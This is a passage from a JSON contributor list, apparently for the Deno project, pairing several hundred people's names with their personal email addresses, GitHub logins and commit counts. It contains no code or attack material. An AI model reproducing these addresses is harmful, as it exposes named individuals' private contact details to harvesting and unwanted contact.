Heidemann","email":"56122437+bcheidemann","login":"bcheidemann","count":3},{"name":"Anil Seervi","email":"61609033+AnilSeervi","login":"AnilSeervi","count":3},{"name":"Aurélien Bertron","email":"aurelienbertron@gmail.com","login":"Nautigsam","count":3},{"name":"Varun Chawla","email":"34209028+veeceey","login":"veeceey","count":3},{"name":"web-dev0521","email":"jasonpette1783@gmail.com","login":"web-dev0521","count":3},{"name":"sgasho","email":"142221789+sgasho","login":"sgasho","count":3},{"name":"mash-graz","email":"mash-graz","login":"mash-graz","count":3},{"name":"letianpailove","email":"113023596+letianpailove","login":"letianpailove","count":3},{"name":"jingweicai","email":"285025525@qq.com","login":"caijw","count":3},{"name":"Oliver Lenehan","email":"sunsetkookaburra+github@outlook.com.au","login":null,"count":3},{"name":"Amen","email":"kluverkamp@hotmail.com","login":"KluVerKamp","count":3},{"name":"Amos Lim","email":"amoseui@gmail.com","login":"amoseui","count":3},{"name":"Adam Conrad","email":"422184+acconrad","login":"acconrad","count":3},{"name":"Andrew Nester","email":"andrew.nester.dev@gmail.com","login":"andrewnester","count":3},{"name":"Antoine du Hamel","email":"duhamelantoine1995@gmail.com","login":"aduh95","count":3},{"name":"Avocet","email":"avocet@deno.com","login":"avocet-bot","count":3},{"name":"Birk Skyum","email":"74932975+birkskyum","login":"birkskyum","count":3},{"name":"Caleb Cox","email":"canac","login":"canac","count":3},{"name":"Colin Harrington","email":"colin.harrington@gmail.com","login":"ColinHarrington","count":3},{"name":"Dimitris Apostolou","email":"dimitris.apostolou@icloud.com","login":"rex4539","count":3},{"name":"Evan","email":"96965321+0xIchigo","login":"0xIchigo","count":3},{"name":"Evan Hahn","email":"me@evanhahn.com","login":"EvanHahn","count":3},{"name":"Evgeniy Karagodin","email":"ekaragodin@gmail.com","login":"ekaragodin","count":3},{"name":"Guy Bedford","email":"guybedford@gmail.com","login":"guybedford","count":3},{"name":"Jun Kato","email":"i@junkato.jp","login":"arcatdmz","count":3},{"name":"Shogo Hida","email":"shogohida","login":"shogohida","count":2},{"name":"hvithrafn","email":"darinmorrison@gmail.com","login":"silvanshade","count":2},{"name":"Hirotaka Tagawa / wafuwafu13","email":"mariobaske@i.softbank.jp","login":null,"count":2},{"name":"Robin Wieruch","email":"wrobin@gmx.net","login":"rwieruch","count":2},{"name":"Robert Lin","email":"robertlin1@gmail.com","login":"bobheadxi","count":2},{"name":"Rob Palmer","email":"rob.palmer2@gmail.com","login":"robpalme","count":2},{"name":"River","email":"22485304+actual-size","login":"actual-size","count":2},{"name":"Rajhans Jadhao","email":"rajhans.jadhao@gmail.com","login":"iamrajhans","count":2},{"name":"Prabhanjan","email":"24642451+Sparkenstein","login":"Sparkenstein","count":2},{"name":"Platon Sterkhov","email":"42860321+turtletongue","login":"turtletongue","count":2},{"name":"Pietro Marchini","email":"pietro.marchini94@gmail.com","login":"pmarchini","count":2},{"name":"Paul Thompson","email":"paul.thompson773@gmail.com","login":"PaulThompson","count":2},{"name":"Paolo Barbolini","email":"paolo@paolo565.org","login":"paolobarbolini","count":2},{"name":"Shivam Tiwari","email":"33183708+shivamtiwari3","login":"shivamtiwari3","count":2},{"name":"Shaurya Singh","email":"sshaurya914@gmail.com","login":"LeSingh1","count":2},{"name":"Sebastien Guillemot","email":"SebastienGllmt@gmail.com","login":"SebastienGllmt","count":2},{"name":"Sean Michael Wykes","email":"sean.wykes@nascent.com.br","login":"cryptographix","count":2},{"name":"Scott Olson","email":"scott@solson.me","login":"solson","count":2},{"name":"Sanskar Gauchan","email":"62867497+Sanskar531","login":"Sanskar531","count":2},{"name":"Ruyut","email":"a@ruyut.com","login":"ruyut","count":2},{"name":"Roy Ivy III","email":"rivy.dev@gmail.com","login":"rivy","count":2},{"name":"Simon Menke","email":"simon.menke@gmail.com","login":"fd","count":2},{"name":"Srijan Reddy","email":"srijanreddy98@gmail.com","login":"srijanreddy98","count":2},{"name":"Stephan Seidt","email":"stephan.seidt@gmail.com","login":"seidtgeist","count":2},{"name":"TED@Hexaflow","email":"2466052+tedhexaflow","login":"tedhexaflow","count":2},{"name":"Taisuke Fukuno","email":"fukuno@jig.jp","login":"taisukef","count":2},{"name":"Kwang-in (Dennis) Jung","email":"inylove82@gmail.com","login":"kination","count":2},{"name":"Leo Chandra","email":"leo.chandra11@gmail.com","login":"leoc11","count":2},{"name":"LongYinan","email":"lynweklm@gmail.com","login":"Brooooooklyn","count":2},{"name":"Lucas Caro","email":"lucascaro@gmail.com","login":"lucascaro","count":2},{"name":"Lucas Nogueira","email":"118899497+lucasfernog-crabnebula","login":"lucasfernog-crabnebula","count":2},{"name":"Luka Hartwig","email":"mail@lukahartwig.de","login":"lukahartwig","count":2},{"name":"Mahesh Thakur","email":"maheshthakur9152@gmail.com","login":"MaheshThakur9152","count":2},{"name":"Maksim Bondarenkov","email":"119937608+ognevny","login":"ognevny","count":2},{"name":"Matias Insaurralde","email":"matiasbaruchinsaurralde@gmail.com","login":"matiasinsaurralde","count":2},{"name":"Thiago Veronezi","email":"thiago@veronezi.org","login":null,"count":2},{"name":"Speykious","email":"speykious.the.king@gmail.com","login":null,"count":2},{"name":"Max Dahlgren","email":"83047501+maxedahlgren","login":"maxedahlgren","count":2},{"name":"Maxime Guerreiro","email":"maxime.guerreiro@gmail.com","login":"punkeel","count":2},{"name":"Mert Can Altin","email":"mertgold60@gmail.com","login":"mertcanaltin","count":2},{"name":"familyboat","email":"84062528+familyboat","login":"familyboat","count":2},{"name":"Mirko Jotic","email":"joticmirko@gmail.com","login":"mirkojotic","count":2},{"name":"Miroslav Bajtoš","email":"oss@bajtos.net","login":"bajtos","count":2},{"name":"Mohsen Azimi","email":"me@azimi.me","login":"mohsen1","count":2},{"name":"Muthuraj Ramalingakumar","email":"muthu90tech@gmail.com","login":"muthu90tech","count":2},{"name":"Satya Rohith","email":"gsatyarohith@gmail.com","login":null,"count":2},{"name":"Nicholas R","email":"nico@nrako.com","login":"nrako","count":2},{"name":"Luke Edwards","email":"luke.edwards05@gmail.com","login":"lukeed","count":2},{"name":"Nick Hanley","email":"nicholasjhanley@gmail.com","login":"njhanley","count":2},{"name":"Nikita Sobolev","email":"mail@sobolevn.me","login":"sobolevn","count":2},{"name":"Nimalan","email":"nimalan.m@protonmail.com","login":"Mark1626","count":2},{"name":"Nisheet Sinvhal","email":"nisheet1.sinvhal@gmail.com","login":"Ashniu123","count":2},{"name":"igorsaux","email":"55196698+igorsaux","login":"igorsaux","count":2},{"name":"josephrocca","email":"1167575+josephrocca","login":"josephrocca","count":2},{"name":"kizerkizer","email":"kizerkizerkizerkizerkizer@gmail.com","login":"kizerkizer","count":2},{"name":"lionel-rowe","email":"lionel.rowe@gmail.com","login":"lionel-rowe","count":2},{"name":"luketpeterson","email":"36806965+luketpeterson","login":"luketpeterson","count":2},{"name":"mehmet turac","email":"mehmetturac@gmail.com","login":"mturac","count":2},{"name":"nokazn","email":"41154684+nokazn","login":"nokazn","count":2},{"name":"pk","email":"prettykool@protonmail.com","login":"prettykool","count":2},{"name":"randomicon00","email":"20146907+randomicon00","login":"randomicon00","count":2},{"name":"sanjibani","email":"schoudhury1991@gmail.com","login":"sanjibani","count":2},{"name":"sean watters","email":"sean@watters.io","login":"seanwatters","count":2},{"name":"Romain Prignon","email":"pro.rprignon@gmail.com","login":"romainPrignon","count":2},{"name":"Francesco Borzì","email":"borzifrancesco@gmail.com","login":"FrancescoBorzi","count":2},{"name":"Jack Kelly","email":"dev@j-k.io","login":"06kellyjac","count":2},{"name":"0hmX","email":"109351887+0hmX","login":"0hmX","count":2},{"name":"半岛的蒟蒻bddjr","email":"bddjr08@outlook.com","login":"bddjr","count":2},{"name":"ylxdzsw","email":"ylxdzsw@gmail.com","login":"ylxdzsw","count":2},{"name":"yidaduizuoye","email":"69302204+CAB233","login":"CAB233","count":2},{"name":"upendra1997","email":"Upendra.upadhyay.97@gmail.com","login":"upendra1997","count":2},{"name":"thomas","email":"ster.bzh@gmail.com","login":"eilgin","count":2},{"name":"simwipado","email":"56857885+simwipado","login":"simwipado","count":2},{"name":"siaeyy","email":"75006429+siaeyy","login":"siaeyy","count":2},{"name":"Ayato Tokubi","email":"attokubi@amazon.com","login":"bitoku","count":2},{"name":"Grant Timmerman","email":"744973+grant","login":"grant","count":2},{"name":"Farsen976","email":"etudacfarsen@gmail.com","login":"Farsen976","count":2},{"name":"Dan Rose","email":"dan@digilabs.io","login":"rotu","count":2},{"name":"Takahiko Inayama","email":"sagittariusm25@gmail.com","login":"TETRA2000","count":2},{"name":"Takashi Idobe","email":"idobetakashi@gmail.com","login":"Takashiidobe","count":2},{"name":"Takeshi Kurosawa","email":"taken.spc@gmail.com","login":"takenspc","count":2},{"name":"TarikSogukpinar","email":"70908075+TarikSogukpinar","login":"TarikSogukpinar","count":2},{"name":"Thanapat Chotipun","email":"66824385+PatrickChoDev","login":"PatrickChoDev","count":2},{"name":"Milly","email":"milly.ca@gmail.com","login":"Milly","count":2},{"name":"Tilman Roeder","email":"dyed.green.info@gmail.com","login":"dyedgreen","count":2},{"name":"Tobias Nießen","email":"tniessen","login":"tniessen","count":2},{"name":"Tomislav Fabeta","email":"tomislav.fabeta@gmail.com","login":"bonzzy","count":2},{"name":"Tristan F","email":"LeoDog896@hotmail.com","login":"LeoDog896","count":2},{"name":"Victor Turansky","email":"victor.turansky@gmail.com","login":"turansky","count":2},{"name":"Vishal Pratap Singh","email":"vishal19111999@hotmail.com","login":"vishalvibes","count":2},{"name":"Xiaobo Liu","email":"cppcoffee@gmail.com","login":"cppcoffee","count":2},{"name":"Yingchen Xue","email":"yingchenxue@qq.com","login":"monkingxue","count":2},{"name":"Yungoo Kong","email":"ohsory1324@gmail.com","login":"ohsory1324","count":2},{"name":"Zebreus","email":"zebreus@zebre.us","login":"zebreus","count":2},{"name":"Zhangyuan Nie","email":"yuan@znie.org","login":"zhangyuannie","count":2},{"name":"akazwz","email":"50396286+akazwz","login":"akazwz","count":2},{"name":"bdistin","email":"bdistin@gmail.com","login":"bdistin","count":2},{"name":"champ","email":"champion.ge@gmail.com","login":"champkeh","count":2},{"name":"Brayden","email":"xpyxel@gmail.com","login":null,"count":2},{"name":"cui fliter","email":"imcusg@gmail.com","login":"cuishuang","count":2},{"name":"cuobiezi","email":"liujw22@gmail.com","login":"cuobiezi","count":2},{"name":"diachedelic","email":"diachedelic@gmail.com","login":"diachedelic","count":2},{"name":"Chayim Refael Friedman","email":"chayimfr@gmail.com","login":"ChayimFriedman2","count":2},{"name":"Brenley Dueck","email":"brenleydueck@gmail.com","login":"brenelz","count":2},{"name":"Caleb Lloyd","email":"2414837+caleblloyd","login":"caleblloyd","count":2},{"name":"Cedric Vangout","email":"mail@cvng.dev","login":"cvng","count":2},{"name":"Ch3ri0ur","email":"22932267+Ch3ri0ur","login":"Ch3ri0ur","count":2},{"name":"Jonathan Svenheden","email":"jonathan@svenheden.com","login":"svenheden","count":2},{"name":"Chen Su","email":"ghosind@gmail.com","login":"ghosind","count":2},{"name":"Christian Svensson","email":"csvn.dev@gmail.com","login":"csvn","count":2},{"name":"Christopher Dieringer","email":"cdaringe","login":"cdaringe","count":2},{"name":"Nassim Z","email":"hironichu@pm.me","login":"hironichu","count":2},{"name":"Cooper Benson","email":"skycoop@gmail.com","login":"skycoop","count":2},{"name":"Cornelius Krassow","email":"58032399+ckrassow","login":"ckrassow","count":2},{"name":"Dan Dascalescu","email":"ddascalescu+github@gmail.com","login":"dandv","count":2},{"name":"DanSnow","email":"dododavid006@gmail.com","login":"DanSnow","count":2},{"name":"Darshan Sen","email":"raisinten@gmail.com","login":"RaisinTen","count":2},{"name":"David DeSimone","email":"lord.good.mail@gmail.com","login":"DavidDeSimone","count":2},{"name":"David Stone","email":"davidjamesstone@gmail.com","login":"davidjamesstone","count":2},{"name":"Deepak Vishwakarma","email":"deepak.m.shrma@gmail.com","login":"deepakshrma","count":2},{"name":"Divya","email":"hello@shortdiv.com","login":"shortdiv","count":2},{"name":"Elisée Maurer","email":"elisee@sparklinlabs.com","login":"elisee","count":2},{"name":"Yongwook Choi","email":"flow@hrmm.xyz","login":"hyp3rflow","count":2},{"name":"btoo","email":"8883465+btoo","login":"btoo","count":2},{"name":"carles escrig royo","email":"ce@thehotelsnetwork.com","login":"esroyo","count":2},{"name":"dev-nicolaos","email":"contact@nicolaos.dev","login":"dev-nicolaos","count":2},{"name":"tuhana","email":"git@tuhana.me","login":"catuhana","count":2},{"name":"Arthur Silva","email":"arthurprs@gmail.com","login":"arthurprs","count":2},{"name":"AprilNEA","email":"github@sku.moe","login":"AprilNEA","count":2},{"name":"Andy Vu","email":"andyvu923@gmail.com","login":"andyvu923","count":2},{"name":"Andrey Filatkin","email":"anfilat@mail.ru","login":"anfilat","count":2},{"name":"Andrew Johnston","email":"apjohnsto@gmail.com","login":"billywhizz","count":2},{"name":"Andres Villegas","email":"villegas.pelaez.andres@gmail.com","login":"avillega","count":2},{"name":"Ahab","email":"ahabhgk@gmail.com","login":"ahabhgk","count":2},{"name":"Abdfn","email":"64256993+abdfnx","login":"abdfnx","count":2},{"name":"Thiago Padilha","email":"thiago@padilha.cc","login":"tarruda","count":2},{"name":"2shiori17","email":"98276492+2shiori17","login":"2shiori17","count":2},{"name":"Bhumij Gupta","email":"bhumijgupta@gmail.com","login":"bhumijgupta","count":2},{"name":"Bhuwan Pandit","email":"bhuwanpandit109@gmail.com","login":"bp7968h","count":2},{"name":"Nikola Ristic","email":"risticn6@gmail.com","login":"rista404","count":2},{"name":"Boye Lillejord-Nygård","email":"6630430+boyeln","login":"boyeln","count":2},{"name":"Piyotaro, Kiiroi (きいろい ぴよ太郎)","email":"70329111+piyota6","login":"piyota6","count":2},{"name":"John Spurlock","email":"47259736+johnspurlock-skymethod","login":"johnspurlock-skymethod","count":2},{"name":"Jon Heslop","email":"jon@jonheslop.com","login":"jonheslop","count":2},{"name":"MikaelUrankar","email":"49529234+MikaelUrankar","login":"MikaelUrankar","count":2},{"name":"Haruto Tanaka","email":"61040486+haru0017","login":"haru0017","count":2},{"name":"Joel Chippindale","email":"joel@joelchippindale.com","login":"mocoso","count":2},{"name":"Jimmy Wärting","email":"jimmy@warting.se","login":"jimmywarting","count":2},{"name":"Jimmy Cao","email":"jcao2462@gmail.com","login":"jcao219","count":2},{"name":"Jimmy","email":"151764691+JimmyBowcott","login":"JimmyBowcott","count":2},{"name":"Jeremy Tuloup","email":"jeremy.tuloup@gmail.com","login":"jtpio","count":2},{"name":"yonatan ben avraham","email":"ybenavraham@outbrain.com","login":"yonbav","count":2},{"name":"Janosh Riebesell","email":"janosh.riebesell@gmail.com","login":"janosh","count":2},{"name":"James Wright","email":"james@jamesswright.co.uk","login":"jamesseanwright","count":2},{"name":"João Baptista","email":"15786310+M4RC3L05","login":"M4RC3L05","count":2},{"name":"Julien Cayzac","email":"jcayzac","login":"jcayzac","count":2},{"name":"Jun Jiang","email":"jasl9187@hotmail.com","login":"jasl","count":2},{"name":"Weijia Wang","email":"wjwang13@fudan.edu.cn","login":null,"count":2},{"name":"Kerollos Magdy","email":"kerolloz@yahoo.com","login":"kerolloz","count":2},{"name":"Fenzland","email":"fenzland@163.com","login":"Fenzland","count":2},{"name":"Fenix","email":"zhuzhenfeng1993@hotmail.com","login":"gofenix","count":2},{"name":"Faris Amali Alis","email":"faris@starchild.my","login":"f-a-a","count":2},{"name":"Filip Stevanovic","email":"62512535+filipstev","login":"filipstev","count":2},{"name":"Gasman","email":"90539473+MarybethGasman","login":"MarybethGasman","count":2},{"name":"Eric Long","email":"i@hack3r.moe","login":"hack3ric","count":2},{"name":"Gianluca Oldani","email":"oldanigianluca@gmail.com","login":"Trolloldem","count":2},{"name":"Giovanny Gutiérrez","email":"giovanny.gutierrez@commure.com","login":"bakjos","count":2},{"name":"Gowtham K","email":"73059450+dovakin0007","login":"dovakin0007","count":2},{"name":"A.E Clarence","email":"33183127+clarnx","login":"clarnx","count":2},{"name":"Greg Altman","email":"g.s.altman@gmail.com","login":"fewf","count":2},{"name":"Hirochika Matsumoto","email":"matsujika@gmail.com","login":"hkmatsumoto","count":2},{"name":"Hunnyboy1217","email":"110440428+Hunnyboy1217","login":"Hunnyboy1217","count":2},{"name":"Igor Borisoglebski","email":"161773052+igorbdl","login":"igorbdl","count":2},{"name":"Isaiah Gamble","email":"77396670+tsar-boomba","login":"tsar-boomba","count":2},{"name":"Jaap Aarts","email":"JAicewizard","login":"JAicewizard","count":2},{"name":"Jake Abed","email":"66989570+jake-abed","login":"jake-abed","count":2},{"name":"KrisChambers","email":"Kris.chambers@outlook.com","login":"KrisChambers","count":2},{"name":"Bill Mill","email":"bill@billmill.org","login":"llimllib","count":1},{"name":"BitToby","email":"218712309+bittoby","login":"bittoby","count":1},{"name":"Bob Callaway","email":"bobcallaway","login":"bobcallaway","count":1},{"name":"Bolat Azamat","email":"b.a.bolatuly@gmail.com","login":"bolatuly","count":1},{"name":"Brad Dunbar","email":"dunbarb2@gmail.com","login":"braddunbar","count":1},{"name":"Brandon Kalinowski","email":"4714862+brandonkal","login":"brandonkal","count":1},{"name":"Bernard Lin","email":"bernardlin12@gmail.com","login":"bernard-lin","count":1},{"name":"Brian Bowman","email":"seeker14491@gmail.com","login":"Seeker14491","count":1},{"name":"Ashwin Naren","email":"arihant2math@gmail.com","login":"arihant2math","count":1},{"name":"Carl Rosell","email":"me@carlrosell.com","login":"carlrosell","count":1},{"name":"Carlos Precioso","email":"github@precioso.design","login":"cprecioso","count":1},{"name":"Chandan Kumar","email":"chandankumar.r@gmail.com","login":"ch4nd4n","count":1},{"name":"Charles Duffy","email":"charles@dyfis.net","login":"charles-dyfis-net","count":1},{"name":"Charlie Bellini","email":"karolbelina@gmail.com","login":"bellinitte","count":1},{"name":"Charlie Moog","email":"moogcharlie@gmail.com","login":"cmoog","count":1},{"name":"Chase Knowlden","email":"haroldknowlden@gmail.com","login":"ChaseKnowlden","count":1},{"name":"Chengzhong Wu","email":"legendecas@gmail.com","login":"legendecas","count":1},{"name":"ChenQuan","email":"terasum@163.com","login":"terasum","count":1},{"name":"Anton Dmytriichuk","email":"kaktusad@gmail.com","login":"dfvgbh","count":1},{"name":"Anssi Eteläniemi","email":"aetelani@hotmail.com","login":"aetelani","count":1},{"name":"Antonio Musolino","email":"antoniomusolino007@gmail.com","login":"antoniomuso","count":1},{"name":"AntonioFCG","email":"93491383+Antonio476587","login":"Antonio476587","count":1},{"name":"Arash Arbabi","email":"nervous.fiend@gmail.com","login":"ATheCoder","count":1},{"name":"Aravind","email":"63452117+codesculpture","login":"codesculpture","count":1},{"name":"Armaan Salam","email":"38160090+ArmaanAS","login":"ArmaanAS","count":1},{"name":"Arseny Kruglikov","email":"5552804+arsenykruglikov","login":"arsenykruglikov","count":1},{"name":"Arsh","email":"hi@arsh.sh","login":"lilnasy","count":1},{"name":"Arthur Lafrance","email":"38890624+a-lafrance","login":"a-lafrance","count":1},{"name":"Aleksei Kosyrev","email":"albnnc@gmail.com","login":"albnnc","count":1},{"name":"Atty Eleti","email":"athyuttamre@gmail.com","login":"athyuttamre","count":1},{"name":"Ayu","email":"45892908+ayuusweetfish","login":"ayuusweetfish","count":1},{"name":"Azeem Pinjari","email":"113772951+azeem30","login":"azeem30","count":1},{"name":"Baoshuo Ren","email":"i@baoshuo.ren","login":"renbaoshuo","count":1},{"name":"Bardia Rastin","email":"a.rastin98@gmail.com","login":"bardiarastin","count":1},{"name":"BasiqueEvangelist","email":"basiqueevangelist@yandex.ru","login":"BasiqueEvangelist","count":1},{"name":"Ben Stolovitz","email":"ben@stolovitz.com","login":"citelao","count":1},{"name":"Daiki Ihara","email":"sasurau4@gmail.com","login":"sasurau4","count":1},{"name":"Dan","email":"5727701+dan-j","login":"dan-j","count":1},{"name":"Dan","email":"dan@loudbase.com","login":"panckreous","count":1},{"name":"Dan Gieschen Knutson","email":"19314778+Giesch","login":"Giesch","count":1},{"name":"Dan Vanderkam","email":"danvdk@gmail.com","login":"danvk","count":1},{"name":"Dan Vega","email":"danvega@gmail.com","login":"danvega","count":1},{"name":"Daniel Buckmaster","email":"daniel@crabmusket.net","login":"crabmusket","count":1},{"name":"Daniel Lenksjö","email":"dlenksjo@gmail.com","login":"lenkan","count":1},{"name":"Daniel Mizerski","email":"duelsik@gmail.com","login":"Danielduel","count":1},{"name":"Daniel Perez Alvarez","email":"danielpza@protonmail.com","login":"danielpza","count":1},{"name":"Daniel Ramos","email":"danielramosacosta@hotmail.com","login":"DanielRamosAcosta","count":1},{"name":"CPunisher","email":"1343316114@qq.com","login":"CPunisher","count":1},{"name":"Connor Peet","email":"connor@peet.io","login":"connor4312","count":1},{"name":"Daniel Schildt","email":"daniel.schildt@gmail.com","login":"d2s","count":1},{"name":"Danilo Sampaio","email":"danilo.sampaio@gmail.com","login":"danilosampaio","count":1},{"name":"Danny Denenberg","email":"dannydenenberg@gmail.com","login":"dannydenenberg","count":1},{"name":"Danny Povolotski","email":"dannypovolotski@gmail.com","login":"etodanik","count":1},{"name":"Dante Calderón","email":"dantehemerson@gmail.com","login":"dantehemerson","count":1},{"name":"Dante Issaias","email":"dante@issaias.com","login":"danteissaias","count":1},{"name":"Benny Shi","email":"740004544@qq.com","login":"flyyuan","count":1},{"name":"Chris Bystrek","email":"chris.bystrek@gmail.com","login":"cByst","count":1},{"name":"Chris Couzens","email":"ccouzens@gmail.com","login":"ccouzens","count":1},{"name":"Chris Schepman","email":"cschep@gmail.com","login":"cschep","count":1},{"name":"Chris Veness","email":"chrisv@movable-type.co.uk","login":"chrisveness","count":1},{"name":"Christian Bromann","email":"github@christian-bromann.com","login":"christian-bromann","count":1},{"name":"Christian Gill","email":"gillchristiang@gmail.com","login":"gillchristian","count":1},{"name":"Christian Petersen","email":"fnky","login":"fnky","count":1},{"name":"Clarence Delmacio Manuel","email":"71768661+cs-clarence","login":"cs-clarence","count":1},{"name":"Claudio Cicali","email":"claudio.cicali@gmail.com","login":"claudioc","count":1},{"name":"Clemens Tolboom","email":"clemens@build2be.com","login":"clemens-tolboom","count":1},{"name":"Connor Burton","email":"me@connorburton.com","login":"connorjburton","count":1},{"name":"Dustin Callaway","email":"drcallaway@gmail.com","login":"drcallaway","count":1},{"name":"Coty","email":"13724650+cotyhamilton","login":"cotyhamilton","count":1},{"name":"Craig Morten","email":"46491566+asos-craigmorten","login":"asos-craigmorten","count":1},{"name":"Csaba Okrona","email":"ochronus@ochronus.com","login":"ochronus","count":1},{"name":"Curran McConnell","email":"curran.mcconnell@protonmail.com","login":"lachrimae","count":1},{"name":"Curtis Allen","email":"curtis.n.allen@gmail.com","login":"curtisallen","count":1},{"name":"Daijiro Wachi","email":"daijiro.wachi@gmail.com","login":"watilde","count":1},{"name":"Vitor Matos","email":"thehollowking@protonmail.com","login":null,"count":1},{"name":"YIPG","email":"around.mr.child@gmail.com","login":null,"count":1},{"name":"bartOssh","email":"blenart@eagleeyenetworks.com","login":null,"count":1},{"name":"cedric05","email":"kesavararapu.siva@gmail.com","login":null,"count":1},{"name":"evan","email":"evan@tsu.sh","login":null,"count":1},{"name":"hazæ41","email":"hazae41@gmail.com","login":null,"count":1},{"name":"qlcom","email":"nocontent@tutanota.com","login":null,"count":1},{"name":"thefliik","email":"thefliik@yahoo.com","login":null,"count":1},{"name":"xiaoxintang","email":"longyan.xxt@raycloud.com","login":null,"count":1},{"name":"youngjuning","email":"youngjuning@aliyun.com","login":null,"count":1},{"name":"Adilson Schmitt Junior","email":"adilsonschj@gmail.com","login":"sirgallifrey","count":1},{"name":"Adam Odziemkowski","email":"odziem","login":"odziem","count":1},{"name":"Adam Gregory","email":"adam@aguilaengineering.com","login":"adamgreg","count":1},{"name":"Adakite","email":"88466388+adakite1","login":"adakite1","count":1},{"name":"Absebo","email":"abseboco@gmail.com","login":"Absebo","count":1},{"name":"Abdul Rauf","email":"abdulraufmujahid@gmail.com","login":"armujahid","count":1},{"name":"Aaron Ang","email":"67321817+aaron-ang","login":"aaron-ang","count":1},{"name":"AEtheve","email":"30652308+AEtheve","login":"AEtheve","count":1},{"name":"0xflotus","email":"0xflotus@gmail.com","login":"0xflotus","count":1},{"name":"/usr/bin/cat","email":"109351887+cu8code","login":"cu8code","count":1},{"name":"Akash Vishwakarma","email":"akash.vishwakarma@milliman.com","login":null,"count":1},{"name":"Andrew","email":"lushin.andrei@outlook.com","login":null,"count":1},{"name":"Elad Keyshawn","email":"elad.kishon@msmail.ariel.ac.il","login":null,"count":1},{"name":"Filip Kieres","email":"filip@linux.com","login":null,"count":1},{"name":"Kira","email":"cyra@cyra.pink","login":null,"count":1},{"name":"Giorgi Rostomashvili","email":"giorgi.rostomashvili@inthepocket.com","login":null,"count":1},{"name":"Lazarus Holl","email":"lazhh@protonmail.com","login":null,"count":1},{"name":"Mike Nikles","email":"mikenikles@gmail.com","login":null,"count":1},{"name":"Oron Sharabi","email":"oron@bigpanda.io","login":null,"count":1},{"name":"Paul Whitmer","email":"paul@craftingbytes.com","login":null,"count":1},{"name":"Rob Muhlestein","email":"rob@skilstak.com","login":null,"count":1},{"name":"Rory Malcolm","email":"rory.malcolm@digital.cabinet-office.gov.uk","login":null,"count":1},{"name":"Ryan B.","email":"ryan.betts@deno.com","login":null,"count":1},{"name":"Serhiy Barhamon","email":"sergey@bargamon.ru","login":null,"count":1},{"name":"Shubhadeep Das","email":"shubhadeep.das2016@vitstudent.ac.in","login":null,"count":1},{"name":"Sora Morimoto","email":"git@bsky.moe","login":null,"count":1},{"name":"ThenMorning","email":"zhaowanhua@meituan.com","login":null,"count":1},{"name":"X","email":"git@iamje.com","login":null,"count":1},{"name":"Tomasz Gałkowski","email":"galkowski.t@gmail.com","login":null,"count":1},{"name":"Alvaro","email":"AlvaroBernalG","login":"AlvaroBernalG","count":1},{"name":"Alvaro Parker","email":"64918109+AlvaroParker","login":"AlvaroParker","count":1},{"name":"Andreas","email":"andreas@tabaro.de","login":"ronhippler","count":1},{"name":"Andreas Deininger","email":"andreas@deininger.net","login":"deining","count":1},{"name":"Andreas Kohn","email":"andreas.kohn@gmail.com","login":"ankon","count":1},{"name":"Andrew Hughes","email":"andrew.hughes.101@outlook.com","login":"andrewhughes101","count":1},{"name":"Andrew Stucki","email":"andrew.stucki@gmail.com","login":"andrewstucki","count":1},{"name":"Andrius Kripaitis","email":"andrius.kripaitis@gmail.com","login":"kranux","count":1},{"name":"André Lima","email":"me@limwa.pt","login":"limwa","count":1},{"name":"André Vargas","email":"12630224+andrevargas","login":"andrevargas","count":1},{"name":"C. K. Tang","email":"arctangent20@yahoo.com","login":"cktang88","count":1},{"name":"Dreamacro","email":"Dreamacro@vip.qq.com","login":"Dreamacro","count":1},{"name":"Andy","email":"87505797+AndyBodnar","login":"AndyBodnar","count":1},{"name":"Andy Fleming","email":"andy@andyfleming.com","login":"andyfleming","count":1},{"name":"Andy Jiang","email":"andyjiang@gmail.com","login":"lambtron","count":1},{"name":"Andy Kurnia","email":"andy-k","login":"andy-k","count":1},{"name":"Angelo R.","email":"83848714+haltandcatchwater","login":"haltandcatchwater","count":1},{"name":"Anh Hong","email":"hong4rc@gmail.com","login":"hong4rc","count":1},{"name":"Anonymous","email":"65428781+CrimsonCodes0","login":"CrimsonCodes0","count":1},{"name":"David Asabina","email":"as@bina.me","login":"vidbina","count":1},{"name":"Atakan Ermiş","email":"ataerms@gmail.com","login":null,"count":1},{"name":"Aditya Pandit","email":"adityapandit38@gmail.com","login":"adityapandit17","count":1},{"name":"Adriano","email":"29012873+isAdrisal","login":"isAdrisal","count":1},{"name":"Agustin Casagrande","email":"56738079+agustincasagrande","login":"agustincasagrande","count":1},{"name":"Ajit Rana","email":"ajit.thakurs210@gmail.com","login":"Cistroncoder","count":1},{"name":"Aladeen","email":"zerubeus@gmail.com","login":"zerubeus","count":1},{"name":"Alan Gou","email":"alan@frontapp.com","login":"Nasafato","count":1},{"name":"Alberto Ricart","email":"alberto@synadia.com","login":"aricart","count":1},{"name":"Aleksandr Bukhalo","email":"a@bukhalo.com","login":"evilsprut","count":1},{"name":"AleksandrukTad","email":"t.aleksandruk@gmail.com","login":"AleksandrukTad","count":1},{"name":"Alessandro Scandone","email":"alescandone@gmail.com","login":"ascandone","count":1},{"name":"Alex Gleason","email":"alex@alexgleason.me","login":"alexgleason","count":1},{"name":"李瑞丰","email":"li15227870916@gmail.com","login":null,"count":1},{"name":"AlexDebug","email":"65367567+AlexDebug","login":"AlexDebug","count":1},{"name":"Alexander Kireyev","email":"ak.chatman.media@gmail.com","login":"chatman-media","count":1},{"name":"Alexander Michaud","email":"131308558+armichaud","login":"armichaud","count":1},{"name":"Alexander Sage","email":"sagezander@gmail.com","login":"sagea","count":1},{"name":"Alexandre Negrel","email":"negrel.dev@protonmail.com","login":"negrel","count":1},{"name":"Alexandre Szymocha","email":"alexandre@szymocha.com","login":"qexk","count":1},{"name":"Allen Hai","email":"allenhai03@gmail.com","login":"coetry","count":1},{"name":"Tomáš Znamenáček","email":"tomas.znamenacek@gmail.com","login":"zoul","count":1},{"name":"Tristan Marion","email":"trismarion@gmail.com","login":"TristanMarion","count":1},{"name":"Tsudrat","email":"210191817+Tsudrat","login":"Tsudrat","count":1},{"name":"Tu Shaokun","email":"53142663+tt-a1i","login":"tt-a1i","count":1},{"name":"Tugrul Ates","email":"me@tugrulates.com","login":"tugrulates","count":1},{"name":"Tyler Butler","email":"tyler@tylerbutler.com","login":"tylerbutler","count":1},{"name":"Tyr Chen","email":"tyr.chen@gmail.com","login":"tyrchen","count":1},{"name":"Uday Kumar Choudhary","email":"choudharyuday85@gmail.com","login":"Uday-Choudhary","count":1},{"name":"Umar Bolatov","email":"bolatovumar@gmail.com","login":"bolatovumar","count":1},{"name":"Vagelis 